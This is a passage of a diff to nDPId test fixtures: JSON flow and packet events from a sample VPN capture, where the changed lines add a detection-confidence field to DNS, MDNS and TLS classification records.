-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261034,"flow_last_seen":1569687261034,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261034,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261034,"flow_last_seen":1569687261034,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261034,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261035,"flow_last_seen":1569687261035,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1569687261035,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1569687261035,"pkt":"LH6BsEqhNDY7z3UoCABFAABPv9YAAP8RWk4KAADjS0tLS86PADUAO9rj8yQBAAABAAAAAAAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAHAAB"}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261035,"flow_last_seen":1569687261035,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261035,"flow_last_seen":1569687261035,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261035,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1569687261050,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1569687261050,"pkt":"NDY7z3UoLH6BsEqhCABFAACgAABAADoRntRLS0tLCgAA4wA1360AjBq8xpiBgwABAAAAAQAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAAQABwCMABgABAAACzwBFBm5zLTYzMglhd3NkbnMtMTUDbmV0ABFhd3NkbnMtaG9zdG1hc3RlcgZhbWF6b27AKgAAAAEAABwgAAADhAASdQAAAVGA"}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":206,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1569687261050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":206,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1569687261050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1569687261054,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1569687261054,"pkt":"NDY7z3UoLH6BsEqhCABFAACgAABAADoRntRLS0tLCgAA4wA1zo8AjF9N8ySBgwABAAAAAQAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAHAABwCMABgABAAADVABFBm5zLTYzMglhd3NkbnMtMTUDbmV0ABFhd3NkbnMtaG9zdG1hc3RlcgZhbWF6b27AKgAAAAEAABwgAAADhAASdQAAAVGA"}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":207,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1569687261054,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00659{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":208,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246981,"flow_last_seen":1569687261317,"flow_idle_time":180000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1569687261317,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
-00670{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246982,"flow_last_seen":1569687261318,"flow_idle_time":180000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1569687261318,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":207,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1569687261054,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"vcacrashplan01.hq.corp.viasat.com","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00685{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":208,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246981,"flow_last_seen":1569687261317,"flow_idle_time":180000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1569687261317,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
+00696{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687246982,"flow_last_seen":1569687261318,"flow_idle_time":180000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":602,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1569687261318,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_raop._tcp.local"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261485,"flow_last_seen":1569687261485,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261485,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1569687261485,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1569687261485,"pkt":"LH6BsEqhNDY7z3UoCABFAABPCDAAAP8REfUKAADjS0tLS+dWADUAO8LFIuMBAAABAAAAAAAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAAQAB"}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261485,"flow_last_seen":1569687261485,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261485,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261485,"flow_last_seen":1569687261485,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261485,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261486,"flow_last_seen":1569687261486,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261486,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1569687261486,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1569687261486,"pkt":"LH6BsEqhNDY7z3UoCABFAABPXz4AAP8RuuYKAADjS0tLS965ADUAO3SWXq8BAAABAAAAAAAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAHAAB"}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261486,"flow_last_seen":1569687261486,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261486,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261486,"flow_last_seen":1569687261486,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261486,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1569687261501,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"ts_msec":1569687261501,"pkt":"NDY7z3UoLH6BsEqhCABFAACDAABAADoRnvFLS0tLCgAA4wA151YAb4gYIuOBgwABAAAAAQAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAAQABwBoABgABAAAcIAAoBmRuczEwMcAiCGRuc2FkbWluwCIBawJtAAAcIAAADhAACTqAAAAcIA=="}
-00767{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1569687261501,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1569687261501,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1569687261506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":145,"pkt_l4_len":111,"ts_msec":1569687261506,"pkt":"NDY7z3UoLH6BsEqhCABFAACDAABAADoRnvFLS0tLCgAA4wA13rkAbznpXq+BgwABAAAAAQAADUxQLVJLRVJVUi1PU1gEaHNkMQJjYQdjb21jYXN0A25ldAAAHAABwBoABgABAAAcIAAoBmRuczEwMcAiCGRuc2FkbWluwCIBawJtAAAcIAAADhAACTqAAAAcIA=="}
-00768{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1569687261506,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":226,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1569687261506,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lp-rkerur-osx.hsd1.ca.comcast.net","num_queries":1,"num_answers":1,"reply_code":3,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687262866,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"ts_msec":1569687262866,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAABEAABAAEAGYVoKAADjot4rmd4xAbu3QBvT9S8yS4AYEAD8CwAAAQEIChwNvkTkAuRNDi2ISqeLxJuBXTMcrWivnw=="}
 00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1569687262866,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":292,"pkt_l4_len":258,"ts_msec":1569687262866,"pkt":"LH6BsEqhNDY7z3UoCABFAAEWAABAAEAGYIgKAADjot4rmd4xAbu3QBvj9S8yS4AYEACf4gAAAQEIChwNvkTkAuRNC2FzYPnyOhEIxzv9HgAAAQAAAAAABf0HAAAAAAAAAFYAAAAAABO4pgAAAfJ1AAAAGzdZOcQAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAAEjynVwAAAAAACz6PAAAAAABmQ+JAyo3EgU6LQwAAAAAAAAAAAAAACK7duMsBAQAAAAELYXNg+fI6EQjHO\/0eAAABAAAAAAAF\/QcAAAAAAAAAVgAAAAAAE7imAAAB8nUAAAAbN1k5xAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAAAASPKdXAAAAAAALPo8AAAAAAAAAAQ=="}
@@ -174,9 +174,9 @@
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1569687267035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687267035,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95hAbsGNnxMAAAAALAC\/\/9wfAAAAgQFtAEDAwUBAQgKHA3OcQAAAAAEAgAA"}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1569687267077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1569687267077,"pkt":"NDY7z3UoLH6BsEqhCABFAAA47VEAAPcGXQsIJWZbCgAA4wG73mHOEwD1BjZ8TZASgABbLAAAAgQFtAEBCAo\/+a5OHA3OcQ=="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1569687267077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687267077,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95hAbsGNnxNzhMA9oAQ\/\/\/yvgAAAQEIChwNzpw\/+a5O"}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687267035,"flow_last_seen":1569687267079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569687267079,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"c9f0b47c9805f516e6d3900cb51f7841","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":303,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267035,"flow_last_seen":1569687267125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1600,"flow_avg_l4_payload_len":266,"midstream":0,"ts_msec":1569687267125,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56929,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 